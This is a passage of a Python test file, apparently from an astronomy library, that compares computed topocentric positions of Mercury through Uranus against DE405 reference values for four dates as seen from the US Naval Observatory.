jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (7.9049140222444105, 2.469959592064856, 18.138603904058247, 9.29546814256182), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.33276016366845, 11.24594905426479, -24.421550562485436, 16.68590812465023), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (7.874898511438327, 2.461508188066483, 18.138318996641566, 9.307459135231527), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.415294637224765, 11.205182598299666, -24.420003066967503, 16.630243128506475), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (46.3212267566032, -17.340667089884377, -0.12765060376706572, -9.116616855755964), 0.001 * arcsecond)
compare(az.degrees, (262.18590521567705, 300.9176579181716, 121.97764361867154, 300.1420264373104), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (46.33688339908365, -17.340667089884377, 0.36890915770104016, -9.116616855755964), 0.001 * arcsecond)
compare(az.degrees, (262.18590521567705, 300.9176579181716, 121.97764361867154, 300.1420264373104), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (46.33704240110901, -17.340667089884377, 0.3731892291678349, -9.116616855755964), 0.001 * arcsecond)
compare(az.degrees, (262.18590521567705, 300.9176579181716, 121.97764361867154, 300.1420264373104), 0.001 * arcsecond)
def test_venus_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 4.9665155792599744, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.20866872703497, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 4.936546062416392, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.165161469755127, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 11.152374062990575, 0.001 * arcsecond)
compare(az.degrees, 287.0030740239532, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 11.23199275246975, 0.001 * arcsecond)
compare(az.degrees, 287.0030740239532, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 11.232796262162083, 0.001 * arcsecond)
compare(az.degrees, 287.0030740239532, 0.001 * arcsecond)
def test_venus_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 1.1614662937271143, 0.001 * ra_arcsecond)
compare(dec.degrees, 5.325222585955545, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 1.1533422187037876, 0.001 * ra_arcsecond)
compare(dec.degrees, 5.275819541572404, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -34.134914076462266, 0.001 * arcsecond)
compare(az.degrees, 313.64872862118426, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -34.134914076462266, 0.001 * arcsecond)
compare(az.degrees, 313.64872862118426, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -34.134914076462266, 0.001 * arcsecond)
compare(az.degrees, 313.64872862118426, 0.001 * arcsecond)
def test_venus_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.99311221167692, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.45256680288619, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.99286396137589, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.450404301558034, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 23.228910604670816, 0.001 * arcsecond)
compare(az.degrees, 142.1161398141626, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 23.266773672986005, 0.001 * arcsecond)
compare(az.degrees, 142.1161398141626, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 23.267157712313676, 0.001 * arcsecond)
compare(az.degrees, 142.1161398141626, 0.001 * arcsecond)
def test_venus_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 7.175218975921811, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.87224931182421, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 7.187940160922054, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.849149573371733, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -24.359995410915445, 0.001 * arcsecond)
compare(az.degrees, 327.640588969984, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -24.359995410915445, 0.001 * arcsecond)
compare(az.degrees, 327.640588969984, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -24.359995410915445, 0.001 * arcsecond)
compare(az.degrees, 327.640588969984, 0.001 * arcsecond)
def test_venus_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.venus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (4.9665155792599744, 1.1614662937271143, 15.99311221167692, 7.175218975921811), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.20866872703497, 5.325222585955545, -18.45256680288619, 19.87224931182421), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (4.936546062416392, 1.1533422187037876, 15.99286396137589, 7.187940160922054), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.165161469755127, 5.275819541572404, -18.450404301558034, 19.849149573371733), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (11.152374062990575, -34.134914076462266, 23.228910604670816, -24.359995410915445), 0.001 * arcsecond)
compare(az.degrees, (287.0030740239532, 313.64872862118426, 142.1161398141626, 327.640588969984), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (11.23199275246975, -34.134914076462266, 23.266773672986005, -24.359995410915445), 0.001 * arcsecond)
compare(az.degrees, (287.0030740239532, 313.64872862118426, 142.1161398141626, 327.640588969984), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (11.232796262162083, -34.134914076462266, 23.267157712313676, -24.359995410915445), 0.001 * arcsecond)
compare(az.degrees, (287.0030740239532, 313.64872862118426, 142.1161398141626, 327.640588969984), 0.001 * arcsecond)
def test_mars_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.030112454663165, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.130883187697044, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.999737237126766, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.048966502229923, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -3.540294697028628, 0.001 * arcsecond)
compare(az.degrees, 118.34877634707522, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -3.540294697028628, 0.001 * arcsecond)
compare(az.degrees, 118.34877634707522, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -3.540294697028628, 0.001 * arcsecond)
compare(az.degrees, 118.34877634707522, 0.001 * arcsecond)
def test_mars_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 23.54486790147113, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.883946644223003, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 23.53682348628842, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.936042744435578, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -54.1089628741949, 0.001 * arcsecond)
compare(az.degrees, 338.0117138951488, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -54.1089628741949, 0.001 * arcsecond)
compare(az.degrees, 338.0117138951488, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -54.1089628741949, 0.001 * arcsecond)
compare(az.degrees, 338.0117138951488, 0.001 * arcsecond)
def test_mars_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 22.034740913364253, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.182784253332377, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 22.03447079524992, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.183338672731741, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -36.90573266459917, 0.001 * arcsecond)
compare(az.degrees, 76.12368450672822, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -36.90573266459917, 0.001 * arcsecond)
compare(az.degrees, 76.12368450672822, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -36.90573266459917, 0.001 * arcsecond)
compare(az.degrees, 76.12368450672822, 0.001 * arcsecond)
def test_mars_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 13.8940809044733, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.122804110106655, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 13.905664739133574, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.185661905051244, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 22.094794272017666, 0.001 * arcsecond)
compare(az.degrees, 231.6381663847761, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 22.134776069489533, 0.001 * arcsecond)
compare(az.degrees, 231.6381663847761, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 22.135181528743814, 0.001 * arcsecond)
compare(az.degrees, 231.6381663847761, 0.001 * arcsecond)
def test_mars_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mars).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (16.030112454663165, 23.54486790147113, 22.034740913364253, 13.8940809044733), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.130883187697044, -4.883946644223003, -13.182784253332377, -12.122804110106655), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (15.999737237126766, 23.53682348628842, 22.03447079524992, 13.905664739133574), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.048966502229923, -4.936042744435578, -13.183338672731741, -12.185661905051244), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (-3.540294697028628, -54.1089628741949, -36.90573266459917, 22.094794272017666), 0.001 * arcsecond)
compare(az.degrees, (118.34877634707522, 338.0117138951488, 76.12368450672822, 231.6381663847761), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (-3.540294697028628, -54.1089628741949, -36.90573266459917, 22.134776069489533), 0.001 * arcsecond)
compare(az.degrees, (118.34877634707522, 338.0117138951488, 76.12368450672822, 231.6381663847761), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (-3.540294697028628, -54.1089628741949, -36.90573266459917, 22.135181528743814), 0.001 * arcsecond)
compare(az.degrees, (118.34877634707522, 338.0117138951488, 76.12368450672822, 231.6381663847761), 0.001 * arcsecond)
def test_jupiter_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.103946503374884, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.6522085918269475, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.077992233588102, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.821355893113747, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 49.40651603144681, 0.001 * arcsecond)
compare(az.degrees, 156.07088561561997, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 49.42056980196601, 0.001 * arcsecond)
compare(az.degrees, 156.07088561561997, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 49.420712533159694, 0.001 * arcsecond)
compare(az.degrees, 156.07088561561997, 0.001 * arcsecond)
def test_jupiter_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 6.764836821339949, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.17058790055951, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 6.755365668515656, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.18253602996423, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 38.00505126690997, 0.001 * arcsecond)
compare(az.degrees, 270.63795554820535, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 38.02600464378366, 0.001 * arcsecond)
compare(az.degrees, 270.63795554820535, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 38.02621739324931, 0.001 * arcsecond)
compare(az.degrees, 270.63795554820535, 0.001 * arcsecond)
def test_jupiter_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 1.5914118935512866, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.595923929888196, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 1.5911839414385696, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.593862752942394, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -42.482560972481394, 0.001 * arcsecond)
compare(az.degrees, 359.3596746827537, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -42.482560972481394, 0.001 * arcsecond)
compare(az.degrees, 359.3596746827537, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -42.482560972481394, 0.001 * arcsecond)
compare(az.degrees, 359.3596746827537, 0.001 * arcsecond)
def test_jupiter_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 4.82276173655752, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.649526689253502, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 4.835667333191383, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.670171438742255, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -29.289013841967986, 0.001 * arcsecond)
compare(az.degrees, 4.327425566855523, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -29.289013841967986, 0.001 * arcsecond)
compare(az.degrees, 4.327425566855523, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -29.289013841967986, 0.001 * arcsecond)
compare(az.degrees, 4.327425566855523, 0.001 * arcsecond)
def test_jupiter_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.103946503374884, 6.764836821339949, 1.5914118935512866, 4.82276173655752), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.6522085918269475, 23.17058790055951, 8.595923929888196, 21.649526689253502), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.077992233588102, 6.755365668515656, 1.5911839414385696, 4.835667333191383), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.821355893113747, 23.18253602996423, 8.593862752942394, 21.670171438742255), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (49.40651603144681, 38.00505126690997, -42.482560972481394, -29.289013841967986), 0.001 * arcsecond)
compare(az.degrees, (156.07088561561997, 270.63795554820535, 359.3596746827537, 4.327425566855523), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (49.42056980196601, 38.02600464378366, -42.482560972481394, -29.289013841967986), 0.001 * arcsecond)
compare(az.degrees, (156.07088561561997, 270.63795554820535, 359.3596746827537, 4.327425566855523), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (49.420712533159694, 38.02621739324931, -42.482560972481394, -29.289013841967986), 0.001 * arcsecond)
compare(az.degrees, (156.07088561561997, 270.63795554820535, 359.3596746827537, 4.327425566855523), 0.001 * arcsecond)
def test_saturn_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.4626938858905594, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.045561201575383, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.4352742791152338, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.911391441362444, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -20.662686940324093, 0.001 * arcsecond)
compare(az.degrees, 306.01978569992787, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -20.662686940324093, 0.001 * arcsecond)
compare(az.degrees, 306.01978569992787, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -20.662686940324093, 0.001 * arcsecond)
compare(az.degrees, 306.01978569992787, 0.001 * arcsecond)
def test_saturn_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 19.814469727768646, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.932928080758664, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 19.805283998285297, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.958246345579155, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -48.93337647838982, 0.001 * arcsecond)
compare(az.degrees, 76.8837444919445, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -48.93337647838982, 0.001 * arcsecond)
compare(az.degrees, 76.8837444919445, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -48.93337647838982, 0.001 * arcsecond)
compare(az.degrees, 76.8837444919445, 0.001 * arcsecond)
def test_saturn_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.5845847757319116, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.616768688416162, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.584352575888522, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.614560194137907, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -36.501918751911674, 0.001 * arcsecond)
compare(az.degrees, 341.22347230453323, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -36.501918751911674, 0.001 * arcsecond)
compare(az.degrees, 341.22347230453323, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -36.501918751911674, 0.001 * arcsecond)
compare(az.degrees, 341.22347230453323, 0.001 * arcsecond)
def test_saturn_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 13.628268137367913, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.658197329820583, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 13.639621846921335, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.723370683249701, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 22.96675851611188, 0.001 * arcsecond)
compare(az.degrees, 238.00627672875672, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 23.005094362956072, 0.001 * arcsecond)
compare(az.degrees, 238.00627672875672, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 23.005483182929098, 0.001 * arcsecond)
compare(az.degrees, 238.00627672875672, 0.001 * arcsecond)
def test_saturn_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (2.4626938858905594, 19.814469727768646, 2.5845847757319116, 13.628268137367913), 0.001 * ra_arcsecond)
compare(dec.degrees, (12.045561201575383, -20.932928080758664, 12.616768688416162, -7.658197329820583), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (2.4352742791152338, 19.805283998285297, 2.584352575888522, 13.639621846921335), 0.001 * ra_arcsecond)
compare(dec.degrees, (11.911391441362444, -20.958246345579155, 12.614560194137907, -7.723370683249701), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (-20.662686940324093, -48.93337647838982, -36.501918751911674, 22.96675851611188), 0.001 * arcsecond)
compare(az.degrees, (306.01978569992787, 76.8837444919445, 341.22347230453323, 238.00627672875672), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (-20.662686940324093, -48.93337647838982, -36.501918751911674, 23.005094362956072), 0.001 * arcsecond)
compare(az.degrees, (306.01978569992787, 76.8837444919445, 341.22347230453323, 238.00627672875672), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (-20.662686940324093, -48.93337647838982, -36.501918751911674, 23.005483182929098), 0.001 * arcsecond)
compare(az.degrees, (306.01978569992787, 76.8837444919445, 341.22347230453323, 238.00627672875672), 0.001 * arcsecond)
def test_uranus_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.087016642067397, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.20824442104711183, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.061058763070791, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.37741883683460087, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 49.06396822144731, 0.001 * arcsecond)
compare(az.degrees, 156.65256040205296, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 49.078192535060566, 0.001 * arcsecond)
compare(az.degrees, 156.65256040205296, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 49.07833699756142, 0.001 * arcsecond)
compare(az.degrees, 156.65256040205296, 0.001 * arcsecond)
def test_uranus_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.668863148648313, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.43704804377175, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.65936510933368, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.447712978993913, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -37.0259637798912, 0.001 * arcsecond)
compare(az.degrees, 91.80748703145906, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -37.0259637798912, 0.001 * arcsecond)
compare(az.degrees, 91.80748703145906, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -37.0259637798912, 0.001 * arcsecond)
compare(az.degrees, 91.80748703145906, 0.001 * arcsecond)
def test_uranus_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 21.16527335872666, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.020308119118386, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 21.164991487815, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.020361566142082, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -29.175475562665554, 0.001 * arcsecond)
compare(az.degrees, 88.85671230431439, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -29.175475562665554, 0.001 * arcsecond)
compare(az.degrees, 88.85671230431439, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -29.175475562665554, 0.001 * arcsecond)
compare(az.degrees, 88.85671230431439, 0.001 * arcsecond)
def test_uranus_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 0.48945083888242796, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.358286196725548, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 0.5005545778924997, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.4296958868419787, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -14.5260443119261, 0.001 * arcsecond)
compare(az.degrees, 74.60219420538265, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -14.5260443119261, 0.001 * arcsecond)
compare(az.degrees, 74.60219420538265, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -14.5260443119261, 0.001 * arcsecond)
compare(az.degrees, 74.60219420538265, 0.001 * arcsecond)
def test_uranus_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.087016642067397, 18.668863148648313, 21.16527335872666, 0.48945083888242796), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.20824442104711183, -23.43704804377175, -17.020308119118386, 2.358286196725548), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.061058763070791, 18.65936510933368, 21.164991487815, 0.5005545778924997), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.37741883683460087, -23.447712978993913, -17.020361566142082, 2.4296958868419787), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
